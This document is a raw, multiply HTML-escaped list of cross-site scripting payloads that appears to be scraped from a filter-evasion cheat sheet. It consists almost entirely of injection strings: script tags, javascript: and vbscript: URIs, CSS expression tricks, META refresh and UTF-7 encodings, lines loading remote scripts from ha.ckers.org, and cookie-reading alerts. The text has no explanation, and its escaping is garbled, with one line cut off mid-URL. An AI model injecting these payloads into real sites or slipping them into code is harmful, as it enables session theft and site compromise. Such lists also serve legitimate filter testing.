&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
